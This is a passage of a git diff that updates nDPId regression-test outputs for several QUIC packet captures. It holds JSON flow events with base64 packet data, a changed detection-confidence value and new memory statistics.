QBAFaDVmD71NXRa\/e3YP6nmQf+KzlbGl8euL1ZMv9cv4hs6puTZquoiq4UkwuYeq+A+wUrbkmifgCFGTsiIuVdxZoBfG7mmTcuzlAoj7eSy93FWGxAPnzH+xvdqwSDn+7M9vnHHpWIC+VzveE\/CCes4f3ceohr7y5Dn4lOtoe0vJsPwQpFPf9WtVwM8s2MSRZtgUxdYy5XHczX5uN1c9SlpRqooXhpp0yi4N2DxMNkDHytOhz\/qgou3wcDLhbNb1ToJSHgg+yYI1HFM5GCUBgIcEFdWUnHIoDy\/X\/\/efj02fBjznW3x\/I9rMer6Tvkfo0yrJwxvKS3Vqlk4oY2riLgvgmR0l5D63Voz6cwqCDFk4DSzDUTn584mcKd5zBHU9ozz0R3Cik1cL2iA9pnd7oEAwphcmb3YbMTagxytlPSkDBIcz0Kd4BlZBLPTo1k6ef5SlDhP6oHZInjU+ubb+1fUF0evxg8wgtXW0cZjOTqIqNyOZPsUhY\/78wYZIpgpZZEa60kxvwRBUQ6WZuEEAWO4u8bU4NqJQII0XYAAfp5H0\/BDB\/p+vVgnc1k2DvUWm66+G5dwcauNbi4ru1irvoLehKJx5aMF+fJOZNqPIwy+\/4iFLOkcGGA36sQMRqTOLRYNzYbHYC8YZ\/SOqMCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1561708873328,"flow_last_seen":1561708876422,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5220,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1561708876422,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1561708873328,"flow_last_seen":1561708876422,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5220,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1561708876422,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":5220,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1561708876422} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870069 bytes -~~ total memory freed........: 5870069 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6003703 bytes +~~ total memory freed........: 6003703 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 2343 chars diff --git a/test/results/quic_q50.pcap.out b/test/results/quic_q50.pcap.out index 6ee1da808..2bc15b6de 100644 --- a/test/results/quic_q50.pcap.out +++ b/test/results/quic_q50.pcap.out @@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388088469} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02261{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388088469,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1592388088469,"pkt":"AAAAAAAAAAUAeJuECABFAAVi6fZAAD8RV+v4kIGTuJfB7ZkjAbsFTkJ3y1EwNTAI30oInk7\/XnoAAEU0Sh+G6jJaQ+WVeKqfVhwekyVcdAg3VVt4yXAoIvukSElad3ZdF7cP3aK8QwnOEdppZZL4NlS1J14QMkJkSKLH7KTs\/J1g5Qy7Td2oJivMgU4heBjsrEKX+Kl+zumCGj7r3rx\/PiGGoerDCuUYVs8\/3DPxrp05vPpL4oM6Ym20RL14LkdkclpZEotPzAVfKrp+bORIrEsOakCOFcnmRLxpaPe+skuFxQ7e+No86i++ZXUpHINRIOrrAKO6MnqhHg136TH30JRy5V1vvrx9mRvozkvzR4RrmmOWFYy9MHcYvR9ozsenVMRZ7mYRkPWmCIPXpnhEE4otBm+PYFJSnVZnoQYn2HvDgKZX+IG0tDtVasnvuIWtUyehZMOA3Auz2JN+nSjxfDEV9Q5eGeh8ZL7tXInICXQpmTBohUGs0nyUi\/EfxDhlCRPETyBYxPytgznwCOTRnGV6yUDNYNW6V2twpvbbFw15F57Y24i98N43glYYJUVqHmVwrosseQvdWLtOLEXpAKvwYCJ3nJpSVOyBYXd8okAO08VeVbydpen0iUOESN83ACwm402annjMIqbJEkKbZr1E\/bWLUE9ayryc3t4SI0rfAV3P7Bzoh+ePS0lFG2mEbR3Stl4jejVA5bbBNdQAl2XVCvlfkMcgN6wNzkaUtoY\/V5wJqcqWfzxU\/7CxIyuqjs2t5GkAirbR6GD1vSMG8A49cBdJIe0YUwOEL94vJZZ6kgFxLSzbkqIb\/JGeunCp3ImPtw51lpSKmOzgu+aiRAw0072bcZedmowvyNmMZ6ZwF9G2\/T1BzTiaxUQiuwph0MpDNq0KE8ZLx7252+rHJYkpatjHePpFvOb3XaUfP7KqMGQXysXzDurgMN+iUJmRB27gfV7BceLcaKv4JsOEla7D\/ujhuQ0U6YFyo2O4mZUs06yMlW36Jh9WkejggHA6SE58C6aM0tZVAq4PzUVmlUFs52p22qgRq5vex74TEu58hdkCQjr1pQ94XFmXqgk+AVK0nXtqdM4JYhPeaV0edHucrnphtrDalQIUwHX7zoFqP\/AzYEoeCztqDi\/kawodxc4PmEb6NM25k\/CXUeCX4uUwv5+p46bN3O1M+xvlb2rRRFG9UZ157Oh+jebOu+0rTdiK67yyDJDMe2VTvGsXi+\/G2gN2zIWwGydc\/InHPRNNQKfHhC2jggd6wv4d71pPOaI+XNe1l7JNMzHwfbkZBDlCbcSj+rryXRGPQIhCscDZiFFGrGBnyyH57ea6sGM\/d37gVVa+ukJTnovNq\/9LafSrWBaF2RrNYGE+TcplNYI0Sq5eb9DrfHpoz4HPjO4w6uwZIeHQjlw00+daMYbUpNYvzBru4JYoG4+FnfLnaJ2RX6rVgfBQIqnPe+8ho+oVfDUJnsA6e5JTlC5uDUaaRcrC0+Ji\/wYvhpr9KixWcINr\/Q6IJf8RuaNMWGUoYQRmSfJSGr9d2O1TlO6mLpi0PyY9rao+oramJEZVMS9CvaFzYMM4ekODEtI9lvm8GVMwUuwhbqucZBCNIlAueuvDA9mFax9H3Da0FnXF80HbkF0G0pCqtWSLbDFAFtV9SICp3zwHTJ2IckUyzfK6paD68rLKFhUUBI7WeX4+s0d4Jr10hLHheThooXnr5xOHtBeSEaQFC9zlGwwIuoXzDqApq3BbVKodu6HoOITstmadm3\/MIc7\/KuaqI9NjMgaFSVmEVWOH4WbQci9HsoHbnpJWe8KeP3p1LSqGOSM6yXozbpkk0hMRvAJ\/Gnzq8KxN6H6U"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googletagmanager.com","user_agent":"Chrome\/83.0.4103.101 Android 8.0.0; LDN-L21"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googletagmanager.com","user_agent":"Chrome\/83.0.4103.101 Android 8.0.0; LDN-L21"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388088511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1592388088511,"pkt":"AAAAAAAAABAAH2tiCABFAABGAABAADgRTf64l8Ht+JCBkwG7mSMAMgZJwVEwNTAACN9KCJ5O\/156AEAYUqG2lTe2LeIe+Cm8S2sDMjR\/1C7uy5\/p"} 02265{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388088591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1592388088591,"pkt":"AAAAAAAAABAAH2tiCABFAAViAABAADgRSOK4l8Ht+JCBkwG7mSMFTuaIwlEwNTAACN9KCJ5O\/156AEU0EsFIWbfyiDTriLZoVpXe8mBihbaaK+GuQgLUM2k18a9drw\/KbHYn2D+KnhueaQuI4b5RnobWiDslIfKd8Mirh6o2aIs9a9qw7cUa8PBv7bzqEIAEQzk13O3\/Bmcqazsp\/+kXQrRut7wvxnShl1xW4sNpOBXqxvlB\/nqN8wg\/PWpL9O\/FPVIgCehFv30qEPc3PeeKKCKLfVTqnxPixlqgAYeET9TKamxZDJ72\/UQ6NmlBJ28\/YXsjTDsXud+7gYqA\/RkmlBMjxYZbTaJJhQMqHb0o8hdYWan65TAd6PfEjGBDGWn2GDNSSzDYoVEizxOqWERff9oCjTo1xFO9yhHRjaWZgSFmltr5w5\/Hr6eKjmrddpc4Z+wxKpPufinLcs1Intywm6Clf6ukiL4ZIaBU1Zh4teRYOLqycNHKR892rQ3DuuxVXnpFwyl0zeIkME4yZSYiRCwgQLAMZ5FSfPbweT6hIb84RvwHrX1jO2SDi8RMi1Aevd6oV+JrNOluFTTAKRyLOen4BBBYTSn14h5EAGO0Yjv6iLbKRjvUAlFcrcWVM6\/JgP5X8XCg0n0XzSdc4uh5LhvkR\/h7IvFVZq89RpXeIhO2gstbOOib2aW\/JqKDzWo1j1Ph5gagHkB6L9a5Hjd8OSrqenRM\/Y9mJweUVKkHNmEigtNsMArIaCyxyspF5no9KUYo2Kbty26OhRt50wzulToOyP4NcHmZfEkQflkdukX3pqNAt7MXd3wyob825\/JiVxf+3hjyosU4MNO3H0eUpL9ozj7HdUKWylpVr+NEYpL6oqxrmoewXJqd9\/7HqfpRoNonB9ea0mdvP5YegQRlI+fyAKUMnIwTWXpzfIN2RNvsJqvBECokakuvOOGofWVmnplR5MVVywVaMLE82YUsCGwIntd0a+EJxQgL7mKQ6dtgeQsn1wbHWS02ZvPuWP8OYrCE67jL2v1bL6\/2h+1XCxsQAztrS+QayoAW0KvlpCNW9ac0DTJNHWRO2pghx+tJZNveH28v6DEDiBrmIsxaWJtQIYwcHaS\/T1k9TL2LCukku0Taxl6+Feh7bikCsuVDfdGwZ2pRT01H4nEVENqSGeosdtxGfJ5JRhSV8U5ag1spdFlq0h3UcT8UYP6G3yr+GnTpv73QkQAN+x4OlLFujbI1BhryJRxg9c7xx4qXcEgWlOzLD1VUeIdTUw\/9wkqyS1DOLPWvJnyAWGAWLaLCSlJLekJUN7pBX8rjCfjU7xo6oWXvXMJVSzQZFernDGNc1++8ggV6oievhZKX7xQRNWnCNZClyhkVOAkRHz4B3Pu3La7QFMMFFm3BSS2brzbRyt2jJlkAxNS9aG4l00\/e6zrsSU1aVXhBuBimpONptOjBqK0HbHQLakoucHQiK+bYxbUBefBnGFTfqhmwHZxdyKtPzhH3xEm3CA5vgkPLpEOwlHEjoUbCvszlSBn0Wji8fHC4RVgQwIFqC5GXdKL2QfiRV\/OvVRBkGEKL67PAQH2qyWcGdC4moBOq1ncmuB4DIPvYwpdxlKDGChU2pNuD6lgg74F4ueOWbMcxGtj9TFP7rZPwDq2LKcVUPI30oOBmdOZPG\/tCzNe3afxNrp9eBk\/djyjs8g0B3CLoc0Rdn7ZnCf84F4GyVSI33v4zkOEKnbfwYmbCwm+M0HtlcdG9KI8P8CfdRpGL7i2rguXb1EIkg\/EYpYXxNoWqt46R76SStqYAB32M+Hm2ZBhlK23TOEoqV6bZc6sFLkDbytR7T7rgeeKXoBeF+Tvf8o\/ifp\/T"} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388088469,"flow_last_seen":1592388088935,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":19594,"flow_avg_l4_payload_len":979,"midstream":0,"thread_ts_msec":1592388088935,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388088469,"flow_last_seen":1592388088935,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":19594,"flow_avg_l4_payload_len":979,"midstream":0,"thread_ts_msec":1592388088935,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":19594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1592388088935} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880384 bytes -~~ total memory freed........: 5880384 bytes -~~ total allocations/frees...: 118154/118154 +~~ total memory allocated....: 6014018 bytes +~~ total memory freed........: 6014018 bytes +~~ total allocations/frees...: 120916/120916 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2270 chars diff --git a/test/results/quic_t50.pcap.out b/test/results/quic_t50.pcap.out index 0ee38e0d1..ed4c302d8 100644 --- a/test/results/quic_t50.pcap.out +++ b/test/results/quic_t50.pcap.out @@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1598618820564} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02266{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1598618820564,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598618820564,"pkt":"AAAAAAAAAAQAMt+PCABFAAViUWNAAH8RmQMomn\/IpvC80cKsAbsFTtXAxVQwNTAIVV8y018p2GMAAEU0sFS4EDNRQxtqte6TPI+YvWd+9vuUhbcTQ2HBn9gQQ44SheCG4iJpKGLD8uMQU9W2hflEcgLE5fOUXsKA3b4MY34rhhWyrjNYzozZ6RzNmC3+PSlNh1B9BkCmgwrPckh0gBVa\/FiA4QpDKG9FfMxAAMJa6frV7fG1bb\/7HJhI3yISKMBJBm82DF0OyCTOye8nQRPUiVu4WsjVf6TJP0\/YCQn\/ynhi7Ht\/RBa3IPlCUHvLu303v9QUCibeTQUAguISRnIMNJe1C11ibh+BPlrVWXB5I4w7PGgaDw6mvx7JTybAMrs\/zdPmdFbLzWLaLw6FF+1T6Nf5pXJ9+kE9uEXZ6FzdZDD3MbdQ7S7fF3Xsf3z9uQukVNaW\/VEZbNqdIcOzSZA1HMEos1dDC\/4ViVIfMlO84vWzhZLxq5UvTT6qapu5oFarxgYku3nnVTzVM6SRRUR15vAoGmL3hQ542vEoyxzgRnslUtNtYNF9zlTPnOomXF1\/xSoJJI3VGlXy1gOwEOp28n6wdjsWOzKyE8z1XmBGehbXOUESC8A5oRtpkqOzQJ3g5+dnZdSYCvXi2BLHGA+OVhHokC0D92CqxGKl340PEFDaTPqzeKg+DdhCKEuu94iUqJwa\/EQr0++J\/bZoJuya3A6PiiCAsAWEfWiGB4RZfM+JuqUNIdd0StL9dWeEo7kVq9MAq9yKOBhBD0Nw0u3O6ttMqxfEm25kPEexKv+eLXlFhK9pi814az\/wL0\/CoLWlaMBTnRRk8oxhNZZKjX5cREBszdn5VN++4tz2T7E2jOZOFaOODo\/Wvb7BjuenE7CpgjdjsnLE4Tn\/b4Q53nG\/TvK7\/82EKBXRq\/c5PKnM+b1ENV06F0Dt6cGZ80l0g1EXbz82dUS02CP8vLgamNhFvRmwk0Fytrw6YCdOz2pD+8LecT3ig9EfNeixeZRd4tX0VxcyI5WVzzONGrmWIw1RUeauVQKVXpwzPZA8CukmFuSLsJh+\/5N5AhFjT6YZ08Cfg8mb95WTaUR4Gcz21+e\/jxcv3N2Ucmp36VwT1\/tIEgMyHmC7IWqDmGHm0zoua0BH1NJEIxpCFxOkgrdVfA\/bFJKqQIiWn39D6QQCV9IfFHR0w3Ji8IRmUv2cmzofCCCDXIb7a1RfNYDUaRs4NsKQeKcoYbyoDk1GAb6it6FoAhucYrDmI18nx\/aim5gBIWa2dZw8lcSNFxgWB30MqUt4DZOv8SxNPiLUt+4S7VsKdmL3e9VzPcuMiIPdcykCdDjJcCNMkqrWApVw+k3MVLOUeIU51nBJ5vetMjeccL3kies1jAjqR3odF77JuN1k7xA13AyJHglJBfA9SrQAab1XP78SnPFaTVPIBb4lI+7BBbWiXiUIWbr7QDQ2M+jaZ9aeFPMMv4QQg7YuadL5n0vNmHJxgYLgQVYZUg3g+jMQJiu4KLUJuhihq+lqjYmXeKGtNpGoS9t+klWnsjGnRn75HVlDegNERH7rMuzV5M2eSrUWRcByRHbj5kRkoY6s9x4THwi9YKFtPRSzpfXx6U8\/obpT4A56m9Dtlf0uhD38f9WkHLmiBpPtKg3V58sjjLsP3l91gyKwHDq9OPXkHBllrkj\/HjirESjdb1Tretiw6j18gO7a6gj9juTcUBG0eptAXXuJv2ZyrvtGzBo7DRc8B9KbYOIeUQf7UeOsamqbXhc1aNUt5qklsGe6OvEqu\/YEHpLYtQZ9LUddfbvcwZ\/RUIOT2ImtvT6yXQ32en9NmMy+OFHh52IUE4c2meqx38en"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.googleapis.com","user_agent":"Chrome\/85.0.4183.83 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T050","ja3":"a2fc589336b7c13b674c1bab24655ce7","tls_supported_versions":"TLSv1.3"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.googleapis.com","user_agent":"Chrome\/85.0.4183.83 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T050","ja3":"a2fc589336b7c13b674c1bab24655ce7","tls_supported_versions":"TLSv1.3"}} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1598618820569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598618820569,"pkt":"AAAAAAAAAAEA4e3RCABFAAViAABAADURNGem8LzRKJp\/yAG7wqwFTn46zVQwNTAACFVfMtNfKdhjAEU02pBfi6Ak9u575XrmlbdyG1ag5OIwl7285v3Nxnsw8Lwoy4F9DNlx3pltRvpYv7yRLUAj2EQdI1b8uEmcdP9Lk6QJsvFQO42M\/PbvgSv5aSBR7ADIvkagSIwjp53htGhz\/zYlUUs1e4BKFzWrzHxpBrn3tRk9tC4MHf9tUO5P3B2MeVI3O66nSXCHk1RyPj9cinn3ZjxKtRBXyqmW3s3M2KBsk8zV1XjY13hb0PYC7j36RkDDGj0hoPOlaMR3xRkchF5ijLsbftoS8ZgSl8iT+6IMAemfyOo2vM1AInYx5h0uJCKtYT1HD9yjV1obFkm9JNNq\/Q3d32M9ltbArc4UQulBjQL30PaOFeS6\/NH6OpYAFWIaQylZhMpolrLLQtDKkYaJQK7fW\/adRXsSKcvSfS7LMOOa1iFP74PK9pOe2d+Kge3D10pHw5xvRBL5wIChQyBfmTPUKrK4rHXy82eTRRhTBKuJrbMv9T7XFHN5+H3chAvLWlrpV658DsehpWG\/heFld+bt39EMFPxrvugSLVNfbLvCnkIUyoImjdqvVj6Rx4k6hbJcFfYuU3ax\/j1wXJ1Aar7aVQydz+BiB9Fxk+eH\/qMFSF3ir3mKdIaHP3IUZOdgUkuG2UC5wWlc3438o4bvtGZ3nwifkZhkqJ0KdMIpJExGa\/AQl+d8cNAdSXLXM+DYjJis3nf2FGSiavtkGQ5gse3JeXrzKJFFtk6jcssK9h2Puqhq4IBMocJAfXnRMW\/OZ1jK+viEJjEu86fhopk0fDPB9DnWqNLuhKZbRPvi0CVdVKcq0vHFC\/pj2+NAI0Ops+2nN5yMrR4A6l\/8BcNYUJAtdstA\/Mmp+wdC\/G0p788zz8X\/NLPDa5WBeMhDBZktdXbl9oAq8mg52ggTdaTmm2jXqGKfzHqW5MClayMT0zXTwUHpjyayemAociOoR3pCM\/XoR3ULfnBs5UXukbBcD\/hcJKZpQZl3FeAMsaWvdZIbB62LlhdQiQ9E00tTktJnwHVhmpIGEmHx79qHujB4QnvSRf7rGMoi+J2+2yEf+pyZjFhJ7Vn0wek\/6YlXTjpXTJrPxdQiAfgtbMdrh0tGyM1aWelixaAL3fMRVQAbarGMmZNeVHObrG\/XRHUKe9QBmB0f2ucnxL\/Q5nZRz7iz\/WLt+LDVk7cJtCKxbiwTn6eNjrz\/eeO\/RDUWtAmn\/N2MrSP3BX63IBecgggeajGeDQeu0h0gzpQwmmr1W\/rYunSoqFFX5ouz8a\/O56eupxDBH4dlgKCLpB\/uNcGBsZbZn7D0MSdEq9sU+3rGh6ZCpDREqoFoM\/ePe6ZBwYyN5DfQ5S5xtM5Kx9nzgR0ma7na5nF+l+ByRUVDDcg+R6gDDtX7u7VAfvqTRqMCFrcyF0SqjD73Dx+5jJbDcuF3krsh5cUsmC3ty8BDoVGSf11axnldbf8\/lHSYOw4ulZJKq\/sTz5UxTVW5laCNJjqlY7Z8a7ZX\/gPYZni6DK3sKH\/pwfLD+eJvhi5gUZcI6y+TKOWHX3m7F7jI+o6kmuivTUhAHO0tp8eeKahEg274V6OXbr5gKp+A0ojgsX7ZyT\/qEOZyQW+ZVLpcoLdNi4viDD0P3Ti\/0+eMAJFCD83SXHZE7s3ktIEr1gJA+f8pz2foQ3UUo5VMFxosbOpW130fJlD\/iAqO7lnIbBAljSuAijWA4Tsc5zdOymoeY9QwWVkg13iiuc7J90lC+Sy8otpTVHsB262zMGncSESaXB5zznflxo7CBcJpN5BfwnB6hHSOc+uG"} 